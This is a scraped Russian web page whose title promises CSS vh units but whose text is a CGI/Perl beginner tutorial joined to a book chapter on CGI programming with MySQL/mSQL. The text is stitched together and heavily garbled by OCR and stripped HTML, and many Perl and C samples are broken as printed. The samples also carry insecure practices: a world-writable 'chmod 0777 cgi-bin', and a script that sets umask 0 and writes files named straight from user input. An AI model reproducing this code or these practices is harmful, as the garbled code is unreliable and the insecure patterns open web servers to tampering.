sonyps4.ru

Css vh поддержка мобильными браузерами. Единицы измерения vh, vw, vmin, vmax

Страница 1 из 30

Сегодня такие вещи, как гостевая книга, поиск по серверу, форма для отправки сообщений - неотъемлемый атрибут практически любого серьезного сайта. Проблема внедрения этих и других прибамбасов, разумеется, всячески возбуждает воображение начинающего вебмастера, лишая его сна, аппетита и тяги к пиву. К сожалению, изучение HTML-исходников страниц конкурентов ничего, кроме ссылок на некий "cgi-bin", не дает, да еще в телеконференциях иногда встречается упоминание о каких-то cgi-скриптах. Эта статья и посвящена основам использования этих самых cgi-скриптов во славу и процветание вашего сайта.

Для начала, думаю, надо разобраться с понятиями. CGI-скрипт - это программа, которая выполняется на Web-сервере по запросу клиента (то есть посетителя Web-сайта). Программа эта принципиально ничем не отличается от обычных программ, которые установлены на вашем компьютере - будь то MS Word или игра Quake. CGI - это не язык программирования, на котором написан скрипт, а Common Gateway Interface - специальный интерфейс, с помощью которого и происходит запуск скрипта и взаимодействие с ним.

Краткое лирическое отступление насчет CGI

Итак что такое CGI - скрипты и вообще подобные вещи. Начнем с того что ваш браузер (когда вы набрали URL ) соединяется по протоколу HTTP с указаным сервером и просит у него нужный файл,примерно так:

GET /~paaa/cgi-bin/guestbbok.cgi HTTP/1.0 -Вот это самое главное в запросе

Ну и если запрошен простой файл например .html то если если такой файл есть, То сервер отошлет браузеру ответ:

HTTP/1.0 200 Okay
Content-Type: text/html

Далее после пустой строки(она нужна чтоб отделить заголовок от тела ) идет информация из самого URL "а ...
Вот в принципе и весь WWW ....ходишь от ссылки к ссылке....
А что если Нужно внести в этот унылый процесс что-нибудь по настоящему интерактивное, динамическое,прекрасное и великолепное....? Чтож есть ответ и на этот вопрос. Просто что если в запрашиваемом URL указать спецыальную программу (CGI ,программа Common Gateway Inteface - Общего Шлюзового Интерфейса ) и то что эта прога выдаст то и отправить браузеру....Сервер запускает .cgi программу и она например обработав данные формы заносит вас куда-нибудь в свою базу данных,а вам сообщит что вы большой молодец:)
Ну надеюсь я вас заинтриговал......?

Краткие сведения о том что надо знать чтоб писать CGI скрипты: Ну вопервых надо знать что такое интернет и как он работает (а вы знаете? ;))) ) Ну и чуть-чуть умения прграмировать(это самое главное)
Давайте вместе писанем какой нибудь простенький скриптик а потом я вам расскажу где сдесь собака порылась....
Ну сначала в своем домашнем каталоге создайте директорию cgi-bin :

cd public_html
mkdir cgi-bin
chmod 0777 cgi-bin

Последняя строчка будет очень важна.
Возьмите редактор и наберите: #!/usr/bin/perl
#first.cgi
print "Content-Type: text/html\n\n";
print "";
print "

Hello you!!!

";
print "";

Сохраните его в директории cgi-bin под именем first.cgi .Ну как сохранили?
А теперь сделайте его исполняемым(ведь это программа):

chmod +x first.cgi

Ну вот,подходим к торжественному моменту.... наберите в строке браузера http://www.uic.nnov.ru/~твой_логин/cgi-bin/first.cgi
и посмотрите чо будет. Будет одно из двух,либо скрипт заработает и вы увидите сгенерированую им страничку (поздравляю,в нашем полку прибыло!) либо Internal Server Error -тогда не расстраивайтесь,вы что-то сделали не так. Вам тогда пригодится пособие по ловле блох. Ну вопервых проверку синтаксиса можно осуществить следующим образом:

perl -с first.cgi

Perl вам сразу выдаст либо сообщения об ошибках(ну бывает,точку с запятой пропустили, скобочки или кавычки забыли закрыть...) это сразу по ходу дела поправимо.
Более грубая с логической точки зрения это пропустить вывод пустой строки, которая отделяет заголовок от тела:
print "Content-Type: text/html\n\n"; #Все Правильно
print "Content-Type: text/html\n"; #ОШИБКА!!!

Разберем скрипт:
Первая строка #!/usr/bin/perl Просто указывает где в системе расположен Perl. Вторая это просто коментарий -вы можете тыкать чо угодно после знака #
Затем идет print "Content-Type: text/html\n\n"; Это заголовок указывающий тип содержимого все что скрипт печатает в свой стандартный вывод STDOUT идет на обработку к серверу. Пустая строка отделяет заголовок от тела,которое в нашем случае представляет собой

Hello you!!!



Сервер обработает ответ скрипта и на базе него сформирует и пошлет браузеру ответ.(Сервер обычно не изменяет тела сообщения,он только дополняет заголовок нужными для протокола HTTP полями)

Ну вот азы уже освоены,все не так трудно и удручающе как могло показаться на первый раз
Вы теперь можете сами потренироваться в написании таких вот простеньких скриптов чтоб набить руку.

Глава №9 .

Программирование с использованием CGI

Включение раздела о CGI в книгу по базам данных может показаться столь же странным, как если бы в кулинарную книгу была включена глава о ремонте автомобилей. Разумеется, для того чтобы съездить в магазин за продуктами, нужен исправный автомобиль, но уместно ли об этом говорить? Полное изложение CGI и веб-программирование в целом выходят за рамки данной книги, но краткого введения в эти темы достаточно для того, чтобы расширить возможности MySQL и mSQL по представлению данных в царстве Web.

В основном эта глава предназначена тем, кто изучает базы данных, но не прочь приобрести некоторые знания и в программировании для Web. Если ваша фамилия Бернерс-Ли или Андрессен, вряд ли вы найдете здесь то, чего еще не знаете. Но даже если вы не новичок в CGI, наличие под рукой краткого справочника во время погружения в тайны MySQL и mSQL может оказаться весьма полезным.

Что такое CGI?

Как и большинство акронимов, Common Gateway Interface (CGI - общий шлюзовый интерфейс) мало что говорит по сути. Интерфейс с чем? Где этот шлюз? О какой общности речь? Чтобы ответить на эти вопросы, вернемся немного назад и бросим взгляд на WWW в целом.

Тим Бернерс-Ли, физик, работавший в CERN, придумал Web в 1990 году, хотя план возник еще в 1988. Идея состояла в том, чтобы дать исследователям в области физики элементарных частиц возможность легко и быстро обмениваться мультимедийными данными - текстом, изображениями и звуком - через Интернет. WWW состояла из трех основных частей: HTML, URL и HTTP. HTML - язык форматирования, используемый для представления содержания в Web. URL - это адрес, используемый для получения содержимого в формате HTML (или каком-либо ином) с веб-сервера. И, наконец, HTTP - это язык, который понятен веб-серверу и позволяет клиентам запрашивать у сервера документы.

Возможность пересылки через Интернет информации всех типов явилась революцией, но вскоре была обнаружена и другая возможность. Если можно переслать через Web любой текст, то почему нельзя переслать текст, созданный программой, а не взятый из готового файла? При этом открывается море возможностей. Простой пример: можно использовать программу, выводящую текущее время, так, чтобы читатель видел правильное время при каждом просмотре страницы. Несколько умных голов в National Center for Supercomputing Applications (Национальный центр разработки приложений для суперкомпьютеров -NCSA), которые создавали веб-сервер, такую возможность увидели, и вскоре появился CGI.

CGI - это набор правил, согласно которым программы на сервере могут через веб-сервер посылать данные клиентам. Спецификация CGI сопровождалась изменениями в HTML и HTTP, вводившими новую характеристику, известную как формы.

Если CGI позволяет программам посылать данные клиенту, то формы расширяют эту возможность, позволяя клиенту посылать данные для этой CGI-программы. Теперь пользователь может не только видеть текущее время, но и устанавливать часы! Формы CGI открыли дверь для подлинной интерактивности в мире Web. Распространенные приложения CGI включают в себя:

  • Динамический HTML. Целые сайты могут генерироваться одной CGI-программой.
  • Поисковые механизмы, находящие документы с заданными пользователем словами.
  • Гостевые книги и доски объявлений, в которые пользователи могут добавлять свои сообщения.
  • Бланки заказов.
  • Анкеты.
  • Извлечение информации из размещенной на сервере базы данных.

В последующих главах мы обсудим все эти CGI-приложения, а также и некоторые другие. Все они дают прекрасную возможность соединения CGI с базой данных, что и интересует нас в этом разделе.

Формы HTML

Прежде чем изучать особенности CGI, полезно рассмотреть наиболее часто встречающийся способ, с помощью которого конечные пользователи получают интерфейс к CGI-программам: формы HTML. Формы являются частью языка HTML, предоставляющей конечному пользователю поля различных типов. Данные, вводимые в поля, могут быть пересланы веб-серверу. Поля могут служить для ввода текста или являться кнопками, которые пользователь может нажать или отметить галочкой. Вот пример страницы HTML, содержащей форму:

<НТМL><НЕАD><ТITLЕ>Моя страница с формами


<р>Это страница с формой.


Введите свое имя:



Данная форма создает строку длиной 40 символов, куда пользователь может ввести свое имя. Под строкой для ввода располагается кнопка, при нажатии которой данные формы передаются серверу. Ниже перечислены относящиеся к формам теги, поддерживаемые HTML 3.2 -наиболее распространенным в настоящее время стандартом. Названия тегов и атрибутов могут вводиться в любом регистре, но мы придерживаемся необязательного соглашения, согласно которому открывающие теги пишутся в верхнем регистре, а закрывающие - в нижнем.


Этот тег указывает на начало формы. В конце формы требуется закрывающий тег

. Между тегами
допускаются три атрибута: ACTION задает URL или относительный путь к CGI-програм-ме, которой будут посланы данные; METHOD указывает метод HTTP, посредством которого будет послана форма (это может быть GET или ч POST, но мы почти всегда будем использовать POST); ENCTYPE задает метод кодирования данных (его следует использовать только при четком понимании того, что вы делаете).


Предоставляет наиболее гибкий способ ввода данных пользователем. Фактически есть девять разных типов тега . Тип задается атрибутом TYPE. В предыдущем примере используются два тега : один с типом SUBMIT и другой с типом по умолчанию TEXT. Девять типов следующие:

TEXT

Поле для ввода пользователем одной строки текста.

PASSWORD

To же, что TEXT, но вводимый текст не отображается на экране.

CHECKBOX

Флажок, который пользователь может устанавливать и сбрасывать.

RADIO

Радиокнопка, которая должна объединяться еще хотя бы с одной радиокнопкой. Пользователь может выбрать только одну из них.

SUBMIT

Кнопка, при нажатии которой форма отправляется на веб-сервер.

RESET

Кнопка, при нажатии которой в форме восстанавливаются значения по умолчанию.

FILE

Аналогичен текстовому окну, но предполагает ввод имени файла, который будет отправлен на сервер.

HIDDEN

Невидимое поле, в котором могут храниться данные.

IMAGE

Аналогичен кнопке SUBMIT, но можно задать картинку для изображения на кнопке.

Кроме атрибута TYPE теги обычно имеют атрибут NAME, связывающий введенные в поле данные с некоторым именем. Имя и данные передаются серверу в стиле величина=значение. В предыдущем примере текстовое поле именовалось firstname . Можно использовать атрибут VALUE, чтобы присвоить полям типа TEXT, PASSWORD , FILE и HIDDEN предустановленные значения. Этот же атрибут, используемый с кнопками типа SUBMIT или RESET, выводит на них заданный текст. Поля типа RADIO и CHECKBOX можно отобразить как выставленные с помощью атрибута CHECKED без задания значения.

Атрибут SIZE используется для задания длины полей типа TEXT, PASSWORD и FILE. Атрибут MAXLENGTH можно использовать для ограничения длины вводимого текста. Атрибут SRC задает URL изображения, используемого в типе IMAGE. И наконец, атрибут ALIGN задает характер выравнивания изображения для типа IMAGE и может иметь значение TOP, MIDDLE, BOTTOM (по умолчанию), LEFT или RIGHT (вверх, в середину, вниз, влево, вправо).

.

Как и у тега , у тега , и в качестве текста по умолчанию будет принят любой текст, находящийся между тегами , аналогично атрибуту VALUE для тега . Для тега

, дающая место для ввода очерка. Данные получают имя "essay". Блок текста 70 символов в ширину и 10 строк в глубину. Пространство между тегами

можно использовать для образца очерка. -->

типов "SUBMIT" и "RESET" соответственно. Кнопка "SUBMIT" имеет переопределенную надпись "Ввести данные ", а кнопка "RESET" имеет надпись по умолчанию (определяемую броузером). Кликнув по кнопке "SUBMIT", вы пошлете данные на веб-сервер, Кнопка "RESET" восстановит данные R исходное состояние, удалив все введенные пользователем данные. -->


Единственный тип ввода, который мы здесь не использовали, - это тип IMAGE для тега . Можно было бы использовать его в качестве альтернативного способа отправки формы. Однако тип IMAGE редко совместим с текстовыми и не очень чуткими броузерами, поэтому благоразумно избегать его, если только ваш сайт не выполнен в насыщенном графическом стиле.

После знакомства с основами форм HTML можно приступить к изучению собственно CGI.

Спецификация CGI

Итак, что в точности представляет собой «набор правил», позволяющий CGI-программе, скажем, в Батавии, штат Иллинойс, обмениваться данными с веб-броузером во Внешней Монголии? Официальную спецификацию CGI наряду с массой других сведений о CGI можно найти на сервере NCSA по адресу http://hoohoo . ncsa.uluc.edu/ cgi/. Однако эта глава для того и существует, чтобы вам не пришлось долго путешествовать и самому ее искать.

Есть четыре способа, которыми CGI передает данные между CGI-npor-раммой и веб-сервером, а следовательно, и клиентом Web:

  • Переменные окружения.
  • Командная строка.
  • Стандартное устройство ввода.
  • Стандартное устройство вывода.

С помощью этих четырех методов сервер пересылает все данные, переданные клиентом, CGI-программе. Затем CGI-программа делает свое волшебное дело и пересылает выходные данные обратно серверу, который переправляет их клиенту.

Эти данные приводятся с прикидкой на сервер HTTP Apache. Apache - наиболее распространенный веб-сервер, работающий практически на любой платформе, включая Windows 9х и Windows NT. Однако они могут быть применимы ко всем HTTP-серверам, поддерживающим CGI. Некоторые патентованные серверы, например, от Microsoft и Netscape, могут иметь дополнительные функции или работать несколько иначе. Поскольку лицо Web продолжает изменяться с невероятной скоростью, стандарты все еще развиваются, и в будущем, несомненно, произойдут изменения. Однако, что касается CGI, то эта технология представляется устоявшейся - расплачиваться за это приходится тем, что другие технологии, такие как апплеты, ее потеснили. Все CGI-программы, которые вы напишете, используя эти сведения, почти наверное смогут работать еще долгие годы на большинстве веб-серверов.

Когда CGI-программа вызывается посредством формы - наиболее распространенного интерфейса, броузер передает серверу длинную строку, в начале которой стоит путь к CGI-программе и ее имя. Затем следуют различные другие данные, которые называются информацией пути и передаются CGI-программе через переменную окружения PATH_INFO (рис. 9-1). После информации пути следует символ «?», а за ним - данные формы, которые посылаются серверу с помощью метода HTTP GET. Эти данные становятся доступными CGI-программе через переменную окружения QUERY_STRING . Любые данные, которые страница посылает с использованием метода HTTP POST, который используется чаще всего, будут переданы CGI-программе через стандартное устройство ввода. Типичная строка, которую может получить сервер от броузера, показана на рис. 9-1. Программа с именем formread в каталоге cgi-bin вызывается сервером с дополнительной информацией пути extra/information и данными запроса choice=help - по-видимому, как часть исходного URL. Наконец, данные самой формы (текст «CGI programming» в поле «keywords») пересылаются через метод HTTP POST .

Переменные окружения

Когда сервер выполняет CGI-программу, то прежде всего передает ей некоторые данные для работы в виде переменных окружения. В спецификации официально определены семнадцать переменных, но неофициально используется значительно больше - с помощью описываемого ниже механизма, называемого HTTP_/nec/zams/n. CGI-программа

имеет доступ к этим переменным так же, как и к любым переменным среды командного процессора при запуске из командной строки. В сценарии командного процессора, например, к переменной окружения F00 можно обращаться как $F00; в Perl это обращение выглядит, как $ENV{"F00"} ; в С - getenv("F00") ; и т. д. В таблице 9-1 перечислены переменные, которые всегда устанавливаются сервером - хотя бы и в значение null. Помимо этих переменных данные, возвращаемые клиентом в заголовке запроса, присваиваются переменным вида HTTP_F00 , где F00 - имя заголовка. Например, большинство веб-броузеров включает данные о версии в заголовок с именем USEfl_AGENT . Ваша CGI-npor-рамма может получить эти данные из переменной HTTP_USER_AGENT .

Таблица 9-1. Переменные окружения CGI

Переменная окружения

Описание

CONTENT_LENGTH

Длина данных, переданных методами POST или PUT, в байтах.

CONTENT_TYPE

Тип MIME данных, присоединенных с помощью методов POST или PUT .

GATEWAY_INTERFACE

Номер версии спецификации CGI, поддерживаемой сервером.

PATH_INFO

Дополнительная информация пути, переданная клиентом. Например, для запроса http://www.myserver.eom/test.cgi/this/is/a/ path?field=green значением переменной РАТН_ INFO будет /this/is/a/path.

PATH_TRANSLATED

То же, что PATH_INFO , но сервер производит всю


Возможную трансляцию, например, расширение имен типа «-account». »

QUERY_STRING

Все данные, следующие за символом «?» в URL. Это также данные, передаваемые, когда REQ-UEST_METHOD формы есть GET.

REMOTE_ADDR

IP-адрес клиента, делающего запрос.

REMOTE_HOST

Имя узла машины клиента, если оно доступно.

REMOTE_IDENT

Если веб-сервер и клиент поддерживают идентификацию типа identd, то это имя пользователя учетной записи, которая делает запрос.

REQUEST_METHOD

Метод, используемый клиентом для запроса. Для CGI-программ, которые мы собираемся создавать, это обычно будет POST или GET.

SERVER_NAME Имя узла - или IP-адрес, если имя недоступно, -машины, на которой выполняется веб-сервер.
SERVER_PORT Номер порта, используемого веб-сервером.
SERVER_PROTOCOL
Протокол, используемый клиентом для связи с сервером. В нашем случае этот протокол почти всегда HTTP.
SERVER_SOFTWARE Данные о версии веб-сервера, выполняющего CGI-программу.

SCRIPT_NAME

Путь к выполняемому сценарию, указанный клиентом. Может использоваться при ссылке URL на самого себя, и для того, чтобы сценарии, ссылки на которые существуют в разных местах, могли выполняться по-разному в зависимости от места.

Приведем пример сценария CGI на Perl, который выводит все переменные окружения, установленные сервером, а также все унаследованные переменные, такие как PATH, установленные командным процессором, запустившим сервер.

#!/usr/bin/perl -w

print << HTML;

Content-type: text/html\n\n

<р>Переменные окружения

HTML

foreach (keys %ENV) { print "$_: $ENV{$_}
\n"; }

print <

HTML

Все эти переменные могут быть использованы и даже изменены вашей CGI-программой. Однако эти изменения не затрагивают веб-сервер, запустивший программу.

Командная строка

CGI допускает передачу CGI-программе аргументов в качестве параметров командной строки, которая редко используется. Редко используется она потому, что практические применения ее немногочисленны, и мы не будем останавливаться на ней подробно. Суть в том, что если переменная окружения QUERY_STRING не содержит символа « = », то CGI-программа будет выполняться с параметрами командной строки, взятыми из QUERY_STRING . Например, http://www.myserver.com/cgi- bin/finger?root запустит finger root на www.myserver.com.

Есть две основные библиотеки, обеспечивающие CGI-интерфейс для Perl. Первая из них - cgi-lib.pl Утилита cgi-lib.pl очень распространена, поскольку в течение долгого времени была единственной имеющейся большой библиотекой. Она предназначена для работы в Perl 4, но работает и с Perl 5. Вторая библиотека, CGI.pm, более новая и во многом превосходит cgi-lib.pl. CGI.pm написана для Perl 5 и использует полностью объектно-ориентированную схему для работы с данными CGI. Модуль CGI.pm анализирует стандартное устройство ввода и переменную QUERY_STRING и сохраняет данные в объекте CGI. Ваша программа должна лишь создать новый объект CGI и использовать простые методы, такие как paramQ, для извлечения нужных вам данных. Пример 9-2 служит короткой демонстрацией того, как CGI.pm интерпретирует данные. Все примеры на Perl в этой главе будут использовать CGI.pm.

Пример 9-2. Синтаксический анализ CGI-данных на Perl

#!/usr/bin/perl -w

use CGI qw(:standard);

# Используется модуль CGI.pm. qw(:standard) импортирует

# пространство имен стандартных CGI-функций,чтобы получить

# более понятный код. Это можно делать, если в сценарии

# используется только один объект CGI.

$mycgi = new CGI; #Создать объект CGI, который будет "шлюзом" к данным формы

@fields = $mycgi->param; # Извлечь имена всех заполненных полей формы

print header, start_html("CGI.pm test"); ft Методы "header" и "start_html",

# предоставляемые

# CGI.pm, упрощают получение HTML.

# "header" выводит требуемый заголовок HTTP, a

#"start_html" выводит заголовок HTML с данным названием,

#a также тег .

print "<р>Данные формы:
";

foreach (@fields) { print $_, ":",- $mycgi->param($_), "
"; }

# Для каждого поля вывести имя и значение, получаемое с помощью

# $mycgi->param("fieldname").

print end_html; # Сокращение для вывода завершающих тегов "".

Обработка входных данных в С

Поскольку основные API для MySQL и mSQL написаны на С, мы не будем полностью отказываться от С в пользу Perl, но там, где это уместно, приведем несколько примеров на С. Есть три широко используемые С-библиотеки для CGI-программирования: cgic Тома Бу-телла (Tom Boutell)*; cgihtml Юджина Кима (Eugene Kim)t и libcgi от EIT*. Мы полагаем, что cgic является наиболее полной и простой в использовании. В ней, однако, недостает возможности перечисления всех переменных формы, когда они не известны вам заранее. На самом деле, ее можно добавить путем простого патча, но это выходит за рамки данной главы. Поэтому в примере 9-3 мы используем библиотеку cgihtml, чтобы повторить на С приведенный выше сценарий Perl.

Пример 9-3. Синтаксический анализ CGI-данных на С

/* cgihtmltest.c - Типовая CGI-программа для вывода ключей и их значений

из данных, полученных от формы */

#include

#include "cgi-lib.h" /* Здесь содержатся все определения функций СGI */

#include "html-lib.h" /* Здесь содержатся" все определения вспомогательных функций для HTML */

void print_all(llist 1)

/* Эти функции выводят данные, переданные формой, в том же формате, что и приведенный выше сценарий Perl. Cgihtml предоставляет также встроенную функцию

Print_entries(), которая делает то же самое, используя формат списка HTML. */ {

node* window;

/* Тип "node" определен в библиотеке cgihtml и ссылается на связанный список, в котором хранятся все данные формы. */

window = I.head; /* Устанавливает указатель на начало данных формы */

while (window != NULL) { /* Пройти по связанному списку до последнего (первого пустого) элемента */

printf(" %s:%s
\n",window->entry. name,replace_ltgt(window->entry.value));

/* Вывести данные. Replace__ltgt() - функция, понимающая HTML-кодировку текста и обеспечивающая его правильный вывод на броузер клиента. */

window = window->next; /* Перейти к следующему элементу списка. */

} }

int main() {

llist entries; /* Указатель на проанализированные данные*/

int status; /* Целое число, представляющее статус */

Html__header(); /* Вспомогательная функция HTML, выводящая заголовок HTML*/

Html_begin("cgihtml test");

/* Вспомогательная функция HTML, выводящая начало страницы HTML с указанным заголовком. */

status = read_cgi_input(&entries); /* Производит ввод и синтаксический анализ данных формы*/

Printf("<р>Данные формы:
");

Print_all(entries); /* Вызывает определенную выше функцию print_all(). */

html_end(); /* Вспомогательная функция HTML, выводящая конец страницы HTML. */

List_clear(&entries); /* Освобождает память, занятую данными формы. */

return 0; }

Стандартное устройство вывода

Данные, посылаемые CGI-программой на стандартное устройство вывода, читаются веб-сервером и отправляются клиенту. Если имя сценария начинается с nph-, то данные посылаются прямо клиенту без вмешательства со стороны веб-сервера. В этом случае CGI-программа должна сформировать правильный заголовок HTTP, который будет понятен клиенту. В противном случае предоставьте веб-серверу сформировать HTTP-заголовок за вас.

Даже если вы не используете nph -сценарий, серверу нужно дать одну директиву, которая сообщит ему сведения о вашей выдаче. Обычно это HTTP-заголовок Content-Type , но может быть и заголовок Location . За заголовком должна следовать пустая строка, то есть перевод строки или комбинация CR/LF.

Заголовок Content-Type сообщает серверу, какого типа данные выдает ваша CGI-программа. Если это страница HTML, то строка должна быть Content-Type: text/html. Заголовок Location сообщает серверу другой URL - или другой путь на том же сервере, - куда нужно направить клиента. Заголовок должен иметь следующий вид: Location: http:// www. myserver. com/another/place/.

После заголовков HTTP и пустой строки можно посылать собственно данные, выдаваемые вашей программой, - страницу HTML, изображение, текст или что-либо еще. Среди CGI-программ, поставляемых с сервером Apache, есть nph-test-cgi и test-cgi, которые хорошо демонстрируют разницу между заголовками в стилях nph и не-nph, соответственно.

В этом разделе мы будем использовать библиотеки CGI.pm и cgic, в которых есть функции для вывода заголовков как HTTP, так и HTML. Это позволит вам сосредоточиться на выводе собственно содержания. Эти вспомогательные функции использованы в примерах, приведенных ранее в этой главе.

Важные особенности сценариев CGI

Вы уже знаете, в основном, как работает CGI. Клиент посылает данные, обычно с помощью формы, веб-серверу. Сервер выполняет CGI-программу, передавая ей данные. CGI-программа осуществляет свою обработку и возвращает свои выходные данные серверу, который передает их клиенту. Теперь от понимания того, как работают CGI-npor-раммы, нужно перейти к пониманию того, почему они так широко используются.

Хотя вам уже достаточно известно из этой главы, чтобы собрать простую работающую CGI-программу, нужно разобрать еще несколько важных вопросов, прежде чем создавать реально работающие программы для MySQL или mSQL. Во-первых, нужно научиться работать с несколькими формами. Затем нужно освоить некоторые меры безопасности, которые помешают злоумышленникам получить незаконный доступ к файлам вашего сервера или уничтожить их.

Запоминание состояния

Запоминание состояния является жизненно важным средством предоставления хорошего обслуживания вашим пользователям, а не только служит для борьбы с закоренелыми преступниками, как может показаться. Проблема вызвана тем, что HTTP является так называемым протоколом «без памяти». Это значит, что клиент посылает данные серверу, сервер возвращает данные клиенту, и дальше каждый идет своей дорогой. Сервер не сохраняет о клиенте данных, которые могут понадобиться в последующих операциях. Аналогично, нет уверенности, что клиент сохранит о совершенной операции какие-либо данные, которые можно будет использовать позднее. Это накладывает непосредственное и существенное ограничение на использование World Wide Web.

Составление сценариев CGI при таком протоколе аналогично неспособности запоминать разговор. Всякий раз, разговаривая с кем-либо, независимо от того, как часто вы общались с ним раньше, вам приходится представляться и искать общую тему для разговора. Нет нужды объяснять, что это не способствует продуктивности. Рисунок 9-2 показывает, что всякий раз, когда запрос достигает программы CGI, это совершенно новый экземпляр программы, не имеющий связи с предыдущим.

В части клиента с появлением Netscape Navigator появилось выглядящее наспех сделанным решение под названием cookies. Оно состоит в создании нового HTTP-заголовка, который можно пересылать туда-сюда между клиентом и сервером, похожего на заголовки Content-Type и Location. Броузер клиента, получив заголовок cookie, должен сохранить в cookie данные, а также имя домена, в котором действует этот cookie. После этого всякий раз при посещении URL в пределах указанного домена заголовок cookie должен возвращаться серверу для использования в CGI-программах на этом сервере.

Метод cookie используется в основном для хранения идентификатора пользователя. Сведения о посетителе можно сохранить в файле на машине сервера. Уникальный ID этого пользователя можно послать в качестве cookie броузеру пользователя, после чего при каждом посещении сайта пользователем броузер автоматически посылает серверу этот ID. Сервер передает ID программе CGI, которая открывает соответствующий файл и получает доступ ко всем данным о пользователе. Все это происходит незаметным для пользователя образом.

Несмотря на всю полезность этого метода, большинство больших сайтов не использует его в качестве единственного средства запоминания состояния. Для этого есть ряд причин. Во-первых, не все броузеры поддерживают cookie. До недавнего времени основной броузер для людей с недостаточным зрением (не говоря уже о людях с недостаточной скоростью подключения к сети) - Lynx - не поддерживал cookie. «Официально» он до сих пор их не поддерживает, хотя это делают некоторые его широко доступные «боковые ветви». Во-вторых, что более важно, cookie привязывают пользователя к определенной машине. Одним из великих достоинств Web является то, что она доступна из любой точки света. Независимо от того, где была создана или где хранится ваша веб-страница, ее можно показать с любой подключенной к Интернет машины. Однако если вы попытаетесь получить доступ к поддерживающему cookie сайту с чужой машины, все ваши персональные данные, поддерживавшиеся с помощью cookie, будут утрачены.

Многие сайты по-прежнему используют cookie для персонализации страниц пользователей, но большинство дополняет их традиционным интерфейсом в стиле «имя регистрации/пароль». Если доступ к сайту осуществляется из броузера, не поддерживающего cookie, то страница содержит форму, в которую пользователь вводит имя регистрации и пароль, присвоенные ему при первом посещении сайта. Обычно эта форма маленькая и скромная, чтобы не отпугивать большинство пользователей, не заинтересованных ни в какой персонализации, а просто желающих пройти дальше. После ввода пользователем в форму имени регистрации и пароля CGI находит файл с данными об этом пользователе, как если бы имя посылалось с cookie. Используя этот метод, пользователь может регистрироваться на персонализированном веб-сайте из любой точки света.

Помимо задач учета предпочтений пользователя и длительного хранения сведений о нем можно привести более тонкий пример запоминания состояния, который дают популярные поисковые машины. Осуществляя поиск с помощью таких служб, как AltaVista или Yahoo, вы обычно получаете значительно больше результатов, чем можно отобразить в удобном для чтения виде. Эта проблема решается тем, что показывается небольшое количество результатов - обычно 10 или 20 - и дается какое-либо средство перемещения для просмотра следующей группы результатов. Хотя обычному путешественнику по Web такое поведение кажется обычным и ожидаемым, действительная его реализация нетривиальна и требует запоминания состояния.

Когда пользователь впервые делает запрос поисковому механизму, тот собирает все результаты, возможно, ограничиваясь некоторым предустановленным предельным количеством. Фокус состоит в том, чтобы выдавать эти результаты одновременно в небольшом количестве, запомнив при этом, что за пользователь запрашивал эти результаты и какую порцию он ожидает следующей. Оставляя в стороне сложности самого поискового механизма, мы встаем перед проблемой последовательного предоставления пользователю некоторой информации по одной странице. Рассмотрим пример 9-4, в котором показан сценарий CGI, выводящий десять строк файла и предоставляющий ему возможность просмотреть следующие или предыдущие десять строк.

Пример 9-4. Сохранение состояния в сценарии CGI

#!/usr/bin/perl -w

use CGI;

Open(F,"/usr/dict/words") or die("He могу открыть! $!");

#Это файл, который будет выводиться, может быть любым.

$output = new CGI;

sub print_range { # Это главная функция программы, my $start = shift;

# Начальная строка файла, my $count = 0;

# Указатель, my $line = "";

# Текущая строка файла, print $output->header,

$output->start_html("Moй словарь");

# Создает HTML с заголовком "Мой словарь", print "\n";

while (($count < $start) and ($line = )) { $count++; }

# Пропустить все строки перед начальной, while (($count < $start+10) and ($line ? )) { print $line; $count++; }

# Напечатать очередные 10 строк.

my $newnext = $start+10; my $newprev = $start-10;

# Установить начальные строки для URL "Next" и "Previous",

print "

";

unless ($start == 0) { # Включить URL "Previous", если только вы

# уже не в начале.

print qq%Previous%; }

unless (eof) { # Включить URL "Next", если только вы # не в конце файла.

print qq% Next%;

}

print «HTML; HTML

exit(0); }

# Если данных нет, начать сначала,

if (not $output->param) {

&print_range(0); }

# Иначе начать со строки, указанной в данных.

&print_range($output->param("start"));

В этом примере запоминание состояния производится с помощью простейшего метода. Проблемы с сохранением данных нет, поскольку мы держим их в файле на сервере. Нам нужно только знать, откуда начать вывод, поэтому сценарий просто включает в URL начальную точку для следующей или предыдущей группы строк - все, что необходимо для генерации очередной страницы.

Однако если вам требуется нечто большее, чем возможность просто листать "файл, то полагаться на URL бывает обременительно. Облегчить эту трудность можно через использование формы HTML и включение данных о состоянии в теги типа HIDDEN. Этот метод с успехом используется на многих сайтах, позволяя делать ссылки между взаимосвязанными CGI-программами или расширяя возможности использования одной CGI-программы, как в предыдущем примере. Вместо ссылки на определенный объект, такой как начальная страница, данные URL могут указывать на автоматически генерируемый ID пользователя.

Так работают AltaVista и другие поисковые машины. При первом поиске генерируется ID пользователя, который скрыто включается в последующие URL. С этим ID связаны один или несколько файлов, содержащих результаты запроса. В URL включаются еще две величины: текущее положение в файле результатов и направление, в котором вы хотите перемещаться в нем дальше. Эти три значения - все, что нужно для работы мощных систем навигации больших поисковых машин.

Впрочем, не хватает еще кое-чего. Использовавшийся в нашем примере файл /usr/diet/words очень велик. Что если на середине чтения мы его бросим, но захотим вернуться к нему позднее? Если не запомнить URL следующей страницы, никакого способа вернуться назад нет, даже AltaVista это не позволит. Если вы перезагрузите свой компьютер или станете работать с другого, невозможно вернуться к результатам прежнего поиска, не вводя заново запрос. Однако такое долговременное запоминание состояния лежит в основе персонализации вебсайтов, о которой мы говорили выше, и стоит посмотреть, как им можно воспользоваться. Пример 9-5 является модифицированным вариантом примера 9-4.

Пример 9-5. Устойчивое запоминание состояния

#!/usr/bin/perl -w

use CGI;

umask 0;

Open(F,"/usr/dict/words") or die("He могу открыть! $!");

Chdir("users") or die("He могу перейти в каталог $!");

# Это каталог, где будут храниться все данные

# о пользователе.

Soutput = new CGI;

if (not$output->param) {

print $output->header,

$output->start_html("Мой словарь");

print «HTML;


<р>Введите свое имя пользователя:


HTML

exit(0); }

$user = $output->param("username");

## Если файла пользователя нет, создать его и установить

## начальное значение в "0",

if (not -e "$user") {

open (U, ">$user") or die("He могу открыть! $!");

print U "0\n";

close U;

&print_range("0");

## если пользователь существует и в URL не задано

## начальное значение, прочесть последнее значение и начать с него.

} elsif (not $output->param("start")) {

Open(U,"Suser") or die("He могу открыть пользователя! $!");

$start = ; close U;

chomp $starl;

uprint range($start);

## Если пользователь существует и в URL не указано

## начальное значение, записать начальное значение

## в файл пользователя и начать вывод.

} else{

Open(U,">$user") or die("He могу открыть пользователя для записи! $!");

print U $output->param("start"), "\n";

close U;

&print_range($output->param("start 1)); }

sub print_range {

my $start = shift;

my $count = 0;

my $line = " "
